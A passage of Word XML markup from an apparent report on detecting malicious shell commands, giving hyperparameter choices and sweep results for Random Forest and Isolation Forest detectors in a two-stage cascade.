      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>stage1_retain_recall=0.99</w:t>
      </w:r>
      <w:r>
        <w:t>), placing it so ~99% of training attacks survive</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>stage 1. Choosing a stage-1 threshold by F1 would be a design error, and the</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>sweep is what demonstrates that rather than asserting it.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="120" w:after="80" w:lineRule="auto" w:line="276"/>
      </w:pPr>
      <w:r>
        <w:t>6.6 Explicit hyperparameter choices and rationale</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Random Forest</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>src/models.py</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>build_random_forest</w:t>
      </w:r>
      <w:r>
        <w:t>) — swept in Chapter 7</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">as a full 12-cell </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>n_estimators</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> × </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>max_depth</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> grid on full training data.</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Why</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>n_estimators</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>400</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>On the plateau: the swept grid gains only 0.0017 (D1) / 0.0025 (D2) F1 going from 200 to 500 trees, so anything ≥200 is equivalent. 400 buys the variance reduction of a large ensemble while keeping a fit to ~3 s. Bagging cannot overfit in the ensemble size, so erring high is free apart from compute.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>max_depth</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>24</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">The one hyperparameter that moves the model. Chapter 7 finds depth 20 </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>dominates both</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve"> shallower (10) and unbounded (</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>None</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">) on F1 </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:i/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>and</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve"> FPR on </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:i/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>both</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve"> datasets; production 24 sits on that optimum, bracketed by the swept plateau cells. </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>None</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve"> is worse (D1 F1 0.7850 vs 0.8006 at n=500) because fully grown trees memorise singleton leaves; depth 10 is an underfitting trap that raises recall but inflates FPR by ~70%.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>class_weight</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>`balanced_subsample`</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Cost-sensitive imbalance handling at the 1:3 prior, reweighted per bootstrap sample rather than once globally, so each tree sees a correctly balanced loss. Chosen over resampling so that no synthetic commands enter training.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>min_samples_leaf</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">Left at the sklearn default: with </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>max_depth=24</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve"> already capping capacity, a second regulariser would confound the depth result Chapter 7 reports.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>max_features</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>`"sqrt"`</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>The standard Random Forest setting (≈6 of 43 features per split). This is what decorrelates the trees — the whole point of bagging — and matters more here than usual because Chapter 3 found strongly collinear pairs (</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>len_chars</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>~</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>len_tokens</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve"> 0.897); sampling features per split stops every tree opening on the same size feature.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>n_jobs</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve"> / </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>random_state</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>-1 / 42</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Parallel fit; fixed seed for reproducibility.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Isolation Forest</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>src/models.py</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>IsolationForestDetector</w:t>
      </w:r>
      <w:r>
        <w:t>) — swept in</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Chapter 7 over </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>contamination</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> on both datasets, and over </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>max_samples</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> /</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>n_estimators</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> here (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>analysis/ch6_if_subsample_probe.py</w:t>
      </w:r>
      <w:r>
        <w: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Why</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>contamination</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>0.25</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">Deliberately inert in production, and Chapter 7 proves it: in sklearn </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>contamination</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve"> does not affect the fitted trees at all (</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>score_samples</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve"> is contamination-independent; it only sets </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>offset_</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>), ROC-AUC is identical to four decimals across 0.05–0.30, and both consumers of this model bypass it — the wrapper thresholds at a fixed 0.5, the cascade calibrates on recall retention. It is kept as an honest declaration of the expected anomaly share. If the detector were ever deployed standalone as a tripwire, set it to the SOC's false-alarm budget directly: the sweep shows FPR ≈ contamination (D1 delivered 0.047/0.088/0.189/0.287 against requested 0.05/0.10/0.20/0.30).</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>n_estimators</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>300</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Score stability, not capacity. Liu et al. take t=100 as their default; raising it to 300 moves ROC-AUC by +0.0027 (D1) and −0.0032 (D2) at fixed ψ — i.e. in opposite directions and within noise. Extra trees buy reproducible scores rather than better ones, because ranking quality is set by the 43-feature representation.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>max_samples</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>0.8</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">Kept, but the textbook justification does </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>not</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve"> survive contact with our data. Liu et al. recommend a small fixed sub-sample (ψ=256) on the argument that it reduces </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:i/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>swamping</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve"> and </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:i/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>masking</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">; production instead uses 0.8 of the benign training rows (ψ≈7,319 on D1, ≈4,596 on D2), ~30× larger. We swept it: ψ=256 is the </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>worst</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve"> cell on both datasets (ROC-AUC 0.7983 D1 / 0.6631 D2) and production is within 0.003 of the best (best: ψ=1024 → 0.8149 on D1; ψ=all → 0.6782 on D2, vs production 0.8120 / 0.6768). The entire axis spans 0.017 AUC, so sub-sample size is a weak dial here and the published default is not transferable to this feature space. The likely reason is that swamping and masking are contamination effects — they presuppose anomalies </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:i/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>in the training sample</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve"> — and this detector is fitted on benign rows only, so there are none to protect against. What a 256-row sub-sample does instead is under-cover a strongly multi-modal benign distribution, leaving rare-but-legitimate commands as easy to isolate as attacks. Production is retained as a near-optimal, already-validated setting; §6.5's honest conclusion stands that the ceiling is the representation, not this parameter.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>max_features</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>1.0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>All 43 features available per tree. Unlike the supervised forest we are not trying to decorrelate an ensemble of predictors, and the anomaly signal is a conjunction across obfuscation, path and network features that per-tree feature subsetting would dilute.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>fitted on</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>benign rows only</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">The design commitment: </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>fit()</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve"> drops all rows with </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>label == 1</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
